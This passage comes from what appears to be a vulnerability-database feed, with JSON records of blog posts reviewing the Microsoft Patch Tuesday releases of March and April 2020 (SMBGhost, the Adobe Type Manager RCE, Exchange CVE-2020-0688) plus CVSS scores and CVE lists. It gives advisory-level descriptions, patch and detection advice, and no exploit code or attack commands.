curious.\n\nFull Vulristics report: [ms_patch_tuesday_august2022](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_august2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-23T00:00:26", "type": "avleonov", "title": "Microsoft Patch Tuesday August 2022: DogWalk, Exchange EOPs, 13 potentially dangerous, 2 funny, 3 mysterious vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2022-21980", "CVE-2022-24477", "CVE-2022-24516", "CVE-2022-2623", "CVE-2022-26233", "CVE-2022-30133", "CVE-2022-30190", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34691", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35742", "CVE-2022-35744", "CVE-2022-35755", "CVE-2022-35766", "CVE-2022-35777", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35804", "CVE-2022-35825", "CVE-2022-35826", "CVE-2022-35827"], "modified": "2022-08-23T00:00:26", "id": "AVLEONOV:37BE727F2D0C216B8B10BD6CBE6BD061", "href": "https://avleonov.com/2022/08/23/microsoft-patch-tuesday-august-2022-dogwalk-exchange-eops-13-potentially-dangerous-2-funny-3-mysterious-vulnerabilities/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T08:03:36", "description": "## SMBv3 "Wormable" RCE\n\nWithout a doubt, the hottest Microsoft vulnerability in March 2020 is the "Wormable" Remote Code Execution in SMB v3 CVE-2020-0796. The most commonly used names for this vulnerability are EternalDarkness, SMBGhost and CoronaBlue. \n\n![Microsoft Patch Tuesday for March 2020: a new record was set, SMBv3 \"Wormable\" RCE and updates for February goldies](https://avleonov.com/wp-content/uploads/2020/03/Microsoft_Patch_Tuesday_March_2020.png)\n\nThere was a strange story of how it was disclosed. It seems like Microsoft accidentally mentioned it in their blog. Than they somehow found out that the patch for this vulnerability will not be released in the March Patch Tuesday. So, they removed the reference to this vulnerability from the blogpost as quickly as they could.\n\nBut some security experts have seen it. And, of course, after [EternalBlue and massive cryptolocker attacks](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) in 2017, each RCE in SMB means "OMG, this is happening again, we need to do something really fast!" So, Microsoft just had to publish an advisory for this vulnerability with the workaround [ADV200005 ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>)and to release an urgent patch [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>).\n\n### So what is it about?\n\n * If we have a vulnerable server, the attacker can send a specially crafted packet to the server and execute arbitrary code. This is the most interesting scenario.\n * If we have a vulnerable client, the attacker can configure a malicious SMBv3 Server and convince the user to connect to this server. So, the attacker will be able to execute arbitrary code on this client host. \n\n### What's the difference between EternalBlue MS17-010 and this case? \n\nThis vulnerability can be exploited because of SMBv3 compression that only works in the latest versions of Windows 10 and Windows Server (1903 and 1909). This means the smaller number of potential targets.\n\nIn the case of EternalBlue and MS17-010, there was a real cyber weapon that was made and tested by NSA. For this new vulnerability we currently have only a [DoS exploit](<https://github.com/eerykitty/CVE-2020-0796-PoC?files=1>) and there is a [video of such exploitation in Kryptos Logic twitter](<https://twitter.com/kryptoslogic/status/1238057276738592768>). Will a fully functional RCE exploit appear in the near future? Who knows\u2026 But it definitely won't hurt to fix this vulnerability as soon as possible.\n\n### How to fix this?\n\nTo install [the patch](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) or switch off SMBv3 compression as it is written [in advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) (but this is not recommended way anymore)\n\n### How to detect this?\n\nThere is an [open source scanner](<https://github.com/ollypwn/SMBGhost>) that detects SMB dialect 3.1.1 and compression capability. Commercial solutions already have plugins for detection, for example, Nessus plugins for [remote](<https://www.tenable.com/plugins/nessus/134421>) and [patch-based](<https://www.tenable.com/plugins/nessus/134428>) detection.\n\n## Patch Tuesday for March 2020\n\nOk, now about the vulnerabilities in Patch Tuesday for March 2020. First of all, there are a lot of them! 115 CVEs! This is a new record and it's impossible to discuss each of them individually. So, I will only mention the main groups. First of all, the different RCEs.\n\n### Remote Code Executions\n\nIn each patch Tuesday there are RCEs in Internet Explorer and Microsoft Edge. And usually the problem is in Chakra JavaScript engine. This time there are 13 RCE CVEs in ChakraCore. They can be potentially exploited if you visit a malicious site. CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0847, CVE-2020-0848 \n\nAnother group of RCEs that is related to some media files. These are vulnerabilities in: \n\n * Windows Graphics Device Interface (GDI) (CVE-2020-0881, CVE-2020-0883)\n * Windows Media Foundation (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\nThey can be also used in a web-based attack, where an attacker convinces a user to visit some malicious website.\n\nThere are also RCEs in Microsoft Word (CVE-2020-0850, CVE-2020-0851, CVE-2020-0852, CVE-2020-0855, CVE-2020-0892). One of them (CVE-2020-0852) can be exploited simply by previewing a malicious file in Mcrosoft Outlook.\n\nBut the most interesting issue is related to .LNK files processing (CVE-2020-0684). When a user opens malicious share or removable drive, Windows Explorer parses the .LNK file and malicious binary executes with the rights of local user.\n\n### Elevation of Privilege\n\nAnd finally, there are many privilege escalation vulnerabilities that use different mechanisms, but all of them could be used to start processes with higher permissions after the initial user login. These vulnerabilities are in: \n\n * Windows Working Folder Service (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866 and CVE-2020-0897)\n * Win32k (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n## February goldies\n\nIn a February Patch Tuesday,[ I mentioned two the most interesting vulnerabilities](<https://avleonov.com/2020/02/13/microsoft-patch-tuesday-february-2020/>). Let's see if something has changed with them in a month.\n\n**Microsoft Exchange server seizure** CVE-2020-0688. By sending a malicious email message the attacker can run commands on a vulnerable Exchange server as the system user (and monitor email communications). \u201cthe attacker could completely take control of an Exchange server through a single e-mail\u201d. This vulnerability now has several exploits, including one in Metasploit "Exchange Control Panel ViewState Deserialization". And there is news that this Microsoft Exchange Server Flaw Exploited in APT Attacks. You can see you all these [updates at Vulners.com](<https://vulners.com/cve/CVE-2020-0688>). \n\nThe second one was **Mysterious Windows RCE** CVE-2020-0662. \u201cTo exploit the vulnerability, an attacker who has a domain user account could create a specially crafted request, causing Windows to execute arbitrary code with elevated permissions.\u201d Without needing to directly log in to the affected device! For this vulnerability, nothing has changed in a month.\n\n![](http://feeds.feedburner.com/~r/avleonov/~4/BTbjjTQwEtQ)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-22T01:15:34", "type": "avleonov", "title": "Microsoft Patch Tuesday March 2020: a new record was set, SMBv3 \u201cWormable\u201d RCE and updates for February goldies", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0662", "CVE-2020-0684", "CVE-2020-0688", "CVE-2020-0768", "CVE-2020-0777", "CVE-2020-0788", "CVE-2020-0796", "CVE-2020-0797", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0807", "CVE-2020-0809", "CVE-2020-0823", "CVE-2020-0825", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0850", "CVE-2020-0851", "CVE-2020-0852", "CVE-2020-0855", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0869", "CVE-2020-0877", "CVE-2020-0881", "CVE-2020-0883", "CVE-2020-0887", "CVE-2020-0892", "CVE-2020-0897"], "modified": "2020-03-22T01:15:34", "id": "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "href": "http://feedproxy.google.com/~r/avleonov/~3/BTbjjTQwEtQ/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T08:03:36", "description": "## Easiest task ever?\n\nMaking the reviews of Microsoft Patch Tuesday vulnerabilities should be an easy task. All vulnerability data is publicly available. Even better, dozens of reviews have already been written. Just read them, combine and post. Right? \n\n![Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities\n](https://avleonov.com/wp-content/uploads/2020/04/MicrosoftPatchTuesdayApril2020.png)\n\nNot really. In fact it is quite boring and annoying. It may be fun to write about vulnerabilities that were already used in some real attacks. But this is a very small part of all vulnerabilities. What about more than a hundred others? They are like \u201csome vulnerability in some component may be used in some attack (or may be not)\u201d. If you describe each of them, no one will read or listen this. \n\nYou must choose what to highlight. And when I am reading the reports from [Tenable](<https://www.tenable.com/blog/microsoft-april-2020-patch-tuesday-addresses-113-cves-including-adobe-type-manager-library>), [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>) and [ZDI](<https://www.thezdi.com/blog/2020/4/14/the-april-2020-security-update-review>), I see that they choose very different groups of vulnerabilities, pretty much randomly.\n\n## My classification script\n\nThat's why I created a script that takes Patch Tuesday CVE data from microsoft.com and visualizes it giving me helicopter view on what can be interesting there. With nice grouping by vulnerability type and product, with custom icons for vulnerability types, coloring based on severity, etc.\n\n## Exploited in the wild\n\nApril 2020 Microsoft Patch Tuesday was published on 14.04.2020 and addressed 113 CVEs. 2 CVEs less than in March, but still too many to discuss them separately. 18 CVEs are critical (other reports say 19, but you can count it yourself) and 3 were exploited in the wild. These 3 are the most interesting, I've got them by "exploited" parameter in Microsoft CVE data.\n\n### Exploitation detected (3)\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Adobe Font Manager Library ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * Windows Kernel ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>))\n\nMicrosoft has finally released a patch for the Adobe Type Manager vulnerability (CVE-2020-1020). The advisory [ADV200006](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006>) appeared on Microsoft website 23.03.2020, 3 week before this patch. The advisory stated, that this vulnerability was used in targeted attack in the wild. That's why it was discussed a lot. The idea is simple. If you open a special file or preview it in Explorer, remote code execution will occur. It is noted that previewing it in Microsoft Outlook is safe. This vulnerability is great for phishing attacks, in addition, it is also possible to exploit it through Web Distributed Authoring and Versioning (WebDAV). It is an extension of the HTTP that allows clients to perform remote Web content authoring operations. It is used, for example, in Microsoft SharePoint or ownCloud. And Microsoft claims that exploitation through WebDAV is the most likely attack vector.\n\nI called this vulnerability "confusing" in the title because:\n\n> To be clear and despite its name, this is *not* Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.\n> \n> -- Rosyna Keller (@rosyna) [March 23, 2020](<https://twitter.com/rosyna/status/1242156545346916352?ref_src=twsrc%5Etfw>)\n\n 1. It has "Adobe" in the name, but is not really related to Adobe. Adobe gave Microsoft the source code of ATM Light for inclusion in Windows 2000/XP. Microsoft maintained this source code after that.\n 2. Microsoft initially stated that RCE exists in 40 version of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019. And this is huge. But then they added that exploitation was detected only for Windows 7. And they "do not recommend that IT administrators running Windows 10 implement the workarounds described" in advisory. For Windows Server 2016 and Windows Server 2019 the vulnerability is only "Important", not "Critical". And the most vulnerable systems won't get the updates by default: "to receive the security update for this vulnerability for Windows 7, Windows Server 2008, or Windows Server 2008 R2 you must have an ESU license". Yet another good reason to upgrade to a newer version.\n 3. The CVE number for this vulnerability was only assigned 3 weeks after it became publicly known. Before that, everyone called it by advisory ID ADV200006. So, CVE is not the ultimate identifier for vulnerabilities. And if you use only CVEs, some vulnerabilities will be out of scope. \n\nAnother vulnerability in the Adobe Font Manager Library (CVE-2020-0938) is very similar to previous CVE-2020-1020, although it impacts a different font renderer.\n\nThe last exploited vulnerability is the Elevation of Privilege (EoP) in Windows kernel (CVE-2020-1027). To exploit the vulnerability, a locally authenticated attacker should run a specially crafted application. Also all versions of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019 are vulnerable.\n\n> We discovered CVE-2020-1027 being exploited in the wild and reported it on 23 March under a 7-day deadline (used only for actively exploited bugs). Microsoft asked for an extension due to current global circumstances and we agreed. Patch details at <https://t.co/VF3SqXHYV9> (1/2)\n> \n> -- Tim Willis (@itswillis) [April 14, 2020](<https://twitter.com/itswillis/status/1250116355602419713?ref_src=twsrc%5Etfw>)\n\n## More likely to be exploited\n\nWhat else can be interesting? I filtered the CVEs with "Exploitation more likely" flag for current and older versions. \n\nAs you can see, the most interesting vulnerability is Scripting Engine Memory Corruption Vulnerability (CVE-2020-0968), which in fact affects Internet Explorer. An attacker can make a specially crafted website that is designed to exploit the vulnerability through Internet Explorer, or use the embedded an ActiveX control in application or Microsoft Office document. As a result, an attacker can execute arbitrary code in the context of the current user.\n\n### Exploitation more likely (7)\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Internet Explorer ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * DirectX ([CVE-2020-0784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0784>), [CVE-2020-0888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0888>))\n * Windows Graphics Component ([CVE-2020-1004](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1004>))\n * Windows Kernel ([CVE-2020-0956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0956>), [CVE-2020-0957](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0957>), [CVE-2020-0958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0958>))\n\nOther more likely to be exploitable vulnerabilities are Elevation of Privilege in DirectX, Windows Graphics Component and Windows Kernel. Not much information is available for them. "An attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system".\n\n## Groups by product\n\nWhat about other 103 vulnerabilities that are less likely to be exploited according to Microsoft. I made groups for products with more then 5 vulnerabilities.\n\n### Other Product based (52)\n\n#### Jet Database Engine\n\n * ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution ([CVE-2020-0889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0889>), [CVE-2020-0953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0953>), [CVE-2020-0959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0959>), [CVE-2020-0960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0960>), [CVE-2020-0988](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0988>), [CVE-2020-0992](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0992>), [CVE-2020-0994](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0994>), [CVE-2020-0995](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0995>), [CVE-2020-0999](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0999>), [CVE-2020-1008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1008>))\n\n#### Media Foundation\n\n * ![](http://www.avleonov.com/vulnicons/memcor.png)Memory Corruption ([CVE-2020-0948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0948>), [CVE-2020-0949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0949>), [CVE-2020-0950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0950>))\n * ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure ([CVE-2020-0937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0937>), [CVE-2020-0939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0939>), [CVE-2020-0945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0945>), [CVE-2020-0946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0946>), [CVE-2020-0947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0947>))\n\n#### Microsoft SharePoint\n\n * ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution ([CVE-2020-0920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0920>), [CVE-2020-0971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0971>), [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>))\n * ![](http://www.avleonov.com/vulnicons/xss.png)Cross Site Scripting ([CVE-2020-0923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0923>), [CVE-2020-0924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0924>), [CVE-2020-0925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0925>), [CVE-2020-0926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0926>), [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>), [CVE-2020-0930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0930>), [CVE-2020-0933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0933>), [CVE-2020-0954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0954>), [CVE-2020-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0973>), [CVE-2020-0978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0978>))\n * ![](http://www.avleonov.com/vulnicons/spoofing.png)Spoofing ([CVE-2020-0972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0972>), [CVE-2020-0975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0975>), [CVE-2020-0976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0976>), [CVE-2020-0977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0977>))\n\n#### Windows\n\n * ![](http://www.avleonov.com/vulnicons/dos.png)Denial of Service ([CVE-2020-0794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0794>))\n * ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege ([CVE-2020-0934](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0934>), [CVE-2020-0983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0983>), [CVE-2020-1009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1009>), [CVE-2020-1011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1011>), [CVE-2020-1015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015>))\n\n#### Windows Kernel\n\n * ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege ([CVE-2020-0913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0913>), [CVE-2020-1000](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1000>), [CVE-2020-1003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1003>))\n * ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure ([CVE-2020-0699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0699>), [CVE-2020-0821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0821>), [CVE-2020-0955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0955>), [CVE-2020-0962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0962>), [CVE-2020-1007](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1007>))\n\nSo, the most interesting groups are Jet Database Engine and Microsoft SharePoint, both have RCEs. \n\n## Groups by vulnerability type\n\nAll other vulnerabilities in different products I combined by vulnerability type. Interesting EoP in OneDrive for Windows, but "most customers have been protected from this vulnerability because OneDrive has its own updater that periodically checks and updates the OneDrive binary".\n\n### Other Vulnerability Type based (51)\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-0969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0969>), [CVE-2020-0970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0970>))\n * Dynamics Business Central ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>))\n * GDI+ ([CVE-2020-0964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0964>))\n * Microsoft Excel ([CVE-2020-0906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0906>), [CVE-2020-0979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0979>))\n * Microsoft Graphics ([CVE-2020-0687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0687>))\n * Microsoft Graphics Components ([CVE-2020-0907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0907>))\n * Microsoft Office ([CVE-2020-0760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0760>), [CVE-2020-0991](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0991>))\n * Microsoft Office Access Connectivity Engine ([CVE-2020-0961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0961>))\n * Microsoft Windows Codecs Library ([CVE-2020-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0965>))\n * Microsoft Word ([CVE-2020-0980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0980>))\n * VBScript ([CVE-2020-0895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0895>), [CVE-2020-0966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0966>), [CVE-2020-0967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0967>))\n * Windows Hyper-V ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>))\n\n#### ![](http://www.avleonov.com/vulnicons/auth_bypass.png)Authentication Bypass\n\n * Microsoft YourPhone Application for Android ([CVE-2020-0943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0943>))\n\n#### ![](http://www.avleonov.com/vulnicons/dos.png)Denial of Service\n\n * Windows DNS ([CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * Connected User Experiences and Telemetry Service ([CVE-2020-0942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0942>), [CVE-2020-0944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0944>), [CVE-2020-1029](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1029>))\n * Microsoft (MAU) Office ([CVE-2020-0984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0984>))\n * Microsoft Defender ([CVE-2020-0835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0835>), [CVE-2020-1002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1002>))\n * Microsoft RMS Sharing App for Mac ([CVE-2020-1019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1019>))\n * Microsoft Remote Desktop App for Mac ([CVE-2020-0919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0919>))\n * Microsoft Visual Studio ([CVE-2020-0899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0899>))\n * Microsoft Windows Update Client ([CVE-2020-1014](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1014>))\n * OneDrive for Windows ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>))\n * Visual Studio Extension Installer Service ([CVE-2020-0900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0900>))\n * Windows Hyper-V ([CVE-2020-0917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0917>), [CVE-2020-0918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0918>))\n * Windows Push Notification Service ([CVE-2020-0940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0940>), [CVE-2020-1001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1001>), [CVE-2020-1006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1006>), [CVE-2020-1017](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1017>))\n * Windows Scheduled Task ([CVE-2020-0936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0936>))\n * Windows Update Stack ([CVE-2020-0985](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0985>), [CVE-2020-0996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0996>))\n * Windows Work Folder Service ([CVE-2020-1094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1094>))\n\n#### ![](http://www.avleonov.com/vulnicons/sf_bypass.png)Security Feature Bypass\n\n * MSR JavaScript Cryptography Library ([CVE-2020-1026](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1026>))\n * Windows Token ([CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>))\n\n#### ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure\n\n * Microsoft Dynamics Business Central/NAV ([CVE-2020-1018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1018>))\n * Microsoft Graphics Component ([CVE-2020-0982](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0982>), [CVE-2020-0987](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0987>), 